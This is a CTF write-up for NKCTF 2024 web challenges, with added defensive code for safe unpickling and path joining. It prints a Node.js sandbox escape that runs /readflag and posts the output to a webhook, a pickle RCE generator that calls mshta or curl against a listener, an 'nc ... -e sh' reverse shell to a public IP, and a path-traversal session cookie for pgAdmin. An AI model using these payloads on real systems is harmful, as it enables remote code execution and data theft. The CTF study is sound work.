NKCTF 2024
web
my first cms
Brute-force the password to log in; command execution from there yields the flag directly.
Reference links
https://github.com/capture0x/CMSMadeSimple2
https://github.com/capture0x/CMSMadeSimple
全世界最简单的CTF (The World's Simplest CTF)
The Node.js fs module can read files; I guessed the file was at app/app.js and read the source that way.
Then use the following payload:
throw new Proxy({}, {
    get: function() {
        const cc = arguments.callee.caller;
        const gg = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
        const fs = gg.mainModule.require('fs').readFileSync('/app/app.js');
        const p = (cc.constructor.constructor('return fetch'))();
        return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${fs}`})});
    }
})
which reads app/app.js.
Its source does not filter `fork`, which is exactly what we can use.
Final script:
// file write succeeded
throw new Proxy({}, {
    get: function() {
        const cc = arguments.callee.caller;
        const gg = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
        let content = `
let cs = require('${`${'child_p'}rocess').exe`}cSync('/readflag').toString();
${`${'proces'}s`}.on("message",function(msg){
    fetch("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: cs})});
})
`;
        const fs = gg.mainModule.require('fs').appendFileSync("./readflag1.js",content);
        const p = (cc.constructor.constructor('return fetch'))();
        return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${fs}`})});
    }
})
// communication succeeded
throw new Proxy({}, {
    get: function() {
        const cc = arguments.callee.caller;
        const g = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
        const h = g.mainModule.require(`${'child_p'}rocess`).fork('./readflag1.js');
        h.send('hello');
        const p = (cc.constructor.constructor('return fetch'))();
        return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${h}`})});
    }
})
Just keep the filter in mind.
attack_tacooooo
Reference link
https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
The script is as follows:
import struct
import sys

def produce_pickle_bytes(platform, cmd):
    # PROTO 4 header followed by a FRAME opcode
    b = b'\x80\x04\x95'
    # FRAME carries an 8-byte length; 'L' is 8 bytes on 64-bit Linux (4 on Windows)
    b += struct.pack('L', 22 + len(platform) + len(cmd))
    # SHORT_BINUNICODE with the module name ('posix' or 'nt')
    b += b'\x8c' + struct.pack('b', len(platform)) + platform.encode()
    # MEMOIZE, SHORT_BINUNICODE 'system', MEMOIZE, STACK_GLOBAL, MEMOIZE
    b += b'\x94\x8c\x06system\x94\x93\x94'
    # SHORT_BINUNICODE with the command string
    b += b'\x8c' + struct.pack('b', len(cmd)) + cmd.encode()
    # MEMOIZE, TUPLE1, MEMOIZE, REDUCE, MEMOIZE, STOP
    b += b'\x94\x85\x94R\x94.'
    print(b)
    return b

if __name__ == '__main__':
    if len(sys.argv) != 2:
        exit(f"usage: {sys.argv[0]} ip:port")
    HOST = sys.argv[1]  # listener address given on the command line
    with open('nt.pickle', 'wb') as f:
        f.write(produce_pickle_bytes('nt', f"mshta.exe http://{HOST}/"))
    with open('posix.pickle', 'wb') as f:
        f.write(produce_pickle_bytes('posix', f"curl http://{HOST}/"))
There is also an smbserver.py.
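The stream above only works because pickle.loads resolves whatever module.name the data names (here posix.system) and then calls it through REDUCE. As an added defensive example, not part of this writeup or of pgAdmin, the block below shows the two controls that stop this: a scanner that lists the globals a pickle would import without executing anything, and an Unpickler subclass whose find_class only resolves an allow-list. The allow-list and both sample streams are constructed for the demonstration; the hostile sample reduces to os.getcwd rather than os.system so it is harmless even if loaded.

```python
import io
import os
import pickle
import pickletools
from datetime import datetime

# Assumed allow-list for this example: the only (module, name) pair the session
# data legitimately needs. A real application enumerates exactly its own types.
ALLOWED_GLOBALS = {("datetime", "datetime")}

STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def scan_pickle(data: bytes) -> list:
    """List every (module, name) the stream would import, without running it.

    GLOBAL (protocol < 4) carries both names in its argument. STACK_GLOBAL
    (protocol 4+) takes them from the two most recently pushed strings, which
    may arrive via the memo, so memo puts and gets are tracked as well.
    """
    found = []
    pushed = []   # string constants pushed so far (None for memo hits that are not strings)
    memo = {}
    last = None   # value most recently pushed on the stack, if it was a string
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            last = arg
            pushed.append(arg)
        elif op.name in GET_OPS:
            last = memo.get(arg)
            pushed.append(last)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last
        elif op.name in PUT_OPS:
            memo[arg] = last
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((pushed[-2], pushed[-1]))
            last = None   # the resolved object, not a string, is now on top
        elif op.stack_after:
            last = None   # some other non-string value was pushed
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Enforcing control: every global reference passes through find_class, so
    an unlisted module/name is never resolved, let alone called by REDUCE."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_load(data: bytes):
    """Return (True, object) when the stream is accepted, else (False, reason)."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


class _ReduceToGetcwd:
    """Constructed sample: pickles to REDUCE(os.getcwd, ()), the same shape as
    the posix.system stream above but with a harmless callable."""

    def __reduce__(self):
        return (os.getcwd, ())


# Constructed sample streams for the demonstration.
SAMPLE_SESSION = pickle.dumps({"user": "alice", "issued": datetime(2024, 3, 24, 12, 0)})
SAMPLE_HOSTILE = pickle.dumps(_ReduceToGetcwd())

if __name__ == "__main__":
    for label, blob in (("session", SAMPLE_SESSION), ("hostile", SAMPLE_HOSTILE)):
        print(label, "imports:", scan_pickle(blob))
        print(label, "restricted load:", safe_load(blob))
```

The scanner is for triage (logging or alerting on what an untrusted blob references before anyone loads it); the allow-listing unpickler is the control that actually blocks the call. Neither replaces the real fix for a session store, which is to sign the session data and refuse to deserialize anything whose signature does not verify.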
First, understand that this vulnerability comes from os.path.join being used to concatenate the path.
This function has two drawbacks:
It does not set a trusted base path that must not be escaped, so os.path.join("/opt/safe/", "../../etc/passwd") returns /etc/passwd.
It uses the right-most absolute path among its arguments as the root, so os.path.join("./safe/", "do_not_escape_from_here", "/etc/passwd") returns /etc/passwd.
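Both drawbacks in one runnable demonstration, beside a join that refuses to leave its base directory. This is an added example, not the writeup's or pgAdmin's code; the base directory /opt/safe and the sample components are assumed, and posixpath is used so the results are identical on every platform.

```python
import posixpath


def naive_join(base: str, *parts: str) -> str:
    """os.path.join as the vulnerable code used it, followed by the normalisation
    the OS applies when the path is opened: no base check, and any absolute
    component resets the result."""
    return posixpath.normpath(posixpath.join(base, *parts))


def safe_join(base: str, *parts: str) -> str:
    """Join untrusted components under base; raise ValueError if the result
    would land outside it. base is assumed to be an absolute directory."""
    base_abs = posixpath.abspath(base)
    candidate = posixpath.abspath(posixpath.join(base_abs, *parts))
    # A plain startswith() check would accept "/opt/safe_evil"; commonpath
    # compares whole components, so only paths at or below base pass.
    if posixpath.commonpath([base_abs, candidate]) != base_abs:
        raise ValueError(f"{candidate!r} escapes {base_abs!r}")
    return candidate


def try_join(base: str, *parts: str):
    """safe_join that returns None instead of raising, for the demonstration."""
    try:
        return safe_join(base, *parts)
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed sample inputs: the two cases from the advisory text, a
    # sibling-directory case, and a legitimate file below the base.
    cases = [
        ("/opt/safe/", "../../etc/passwd"),
        ("./safe/", "do_not_escape_from_here", "/etc/passwd"),
        ("/opt/safe", "../safe_evil/x"),
        ("/opt/safe", "storage", "user", "session.pickle"),
    ]
    for base, *parts in cases:
        print(f"{base!r} + {parts!r}")
        print(f"  naive: {naive_join(base, *parts)}")
        print(f"  safe : {try_join(base, *parts)}")
```

In a deployed service, resolve with os.path.realpath instead of abspath so a symlink planted inside the base cannot point outside it, and validate the individual components (here, the session id) against the format you expect before joining at all.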
The challenge environment runs in a Docker container.
There is no curl or bash inside it,
but nc is present, so nc can be used to get a reverse shell:
nc 8.137.131.159 9006 -e sh
Next, the pga4_session cookie is used to trigger the deserialization:
GET /browser/ HTTP/1.1
Host: 7d4eaaa6-c6d5-487e-a1d4-65986d6adb85.node.nkctf.yuzhian.com.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://7d4eaaa6-c6d5-487e-a1d4-65986d6adb85.node.nkctf.yuzhian.com.cn/login?next=%2F
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!baeac19e-2dcc-4d96-a4c7-1ff410ddd8c2!AZleysLS+ZnrL20IU1mGt6lHxXc3O8/It0JHyC4sJqA=; PGADMIN_LANGUAGE=en
Connection: close
Construct the request as above; the exact path does not matter.
Then just listen on a port on a public IP.